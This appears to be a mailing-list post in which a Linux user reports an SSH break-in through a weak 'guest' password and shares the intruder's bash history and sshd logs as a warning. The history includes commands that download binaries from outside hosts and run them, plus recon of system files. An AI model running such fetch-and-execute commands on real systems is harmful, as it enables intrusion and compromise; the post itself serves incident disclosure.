I checked in on some bittorrent progress today at lunch, noticed my process monitor showing full activity. Ran top, saw user "guest" logged on, running 4 instances of a program named "t", and short term load average over 4. AARRRRGGGHHH! shutdown -h now ! pull network cable reboot look for damage, whew, I was O.K. -- I'm sure it helps to be up to date on security and running 2.6.7. changed all passwords to much stronger Anyhow, I figure turnabout is fair play, so, here's the bash history from the "guest" user account, along with the IP addresses the attacker logged in from:
w uname -a wc -l /etc/passwd wget smenlove.home.ro/t.gz ;tar xzvf t.gz ; rm -rf t.gz ; ./t ./t ./t ./t ./t ./t ls rm -rf t kill -9 %1 kill -9 %1 wget smenlove.home.ro/h.tgz ; tar xzvf h.tgz ; rm -rf h.tgz ; ./h2 w id ./h2 rm -rf h2 wget vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2 -d brk.bz2;chmod +x br k;./brk wget vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2 -d brk.bz2;chmod +x br k;./brk ls passwd exit Jul 19 19:54:41 greta sshd[7071]: Illegal user admin from 131.234.157.10 Jul 19 19:54:41 greta sshd[7071]: error: Could not get shadow information for NO USER Jul 19 19:54:41 greta sshd[7071]: Failed password for illegal user admin from 13 1.234.157.10 port 35860 ssh2 Jul 19 19:54:44 greta sshd[7073]: Illegal user admin from 131.234.157.10 Jul 19 19:54:44 greta sshd[7073]: error: Could not get shadow information for NO USER Jul 19 19:54:44 greta sshd[7073]: Failed password for illegal user admin from 13 1.234.157.10 port 35917 ssh2 Jul 19 19:54:46 greta sshd[7075]: Illegal user user from 131.234.157.10 Jul 22 10:24:38 greta sshd[22403]: Failed password for illegal user test from 15 6.17.99.11 port 37183 ssh2 Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from 156.17.99.11 port 37228 ssh2 Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user guest by ( uid=0) Jul 22 10:24:47 greta sshd[22407]: (pam_unix) session closed for user guest Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from 80.110.102.105 port 3938 ssh2 Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user guest by (uid=0) Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure; logname=guest uid=1002 euid=0 tty= ruser= rhost= user=guest Jul 22 12:13:16 greta sshd[22597]: (pam_unix) session closed for user guest I'm not sure the July 19 log snippet is related, but seems likely. Anyways, I've re-downloaded the files the attacker used and removed (for posterity.) I changed all passwords, IP Address, I found the evidence at about 12:24. Just wanted to share the need for strong passwords. -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
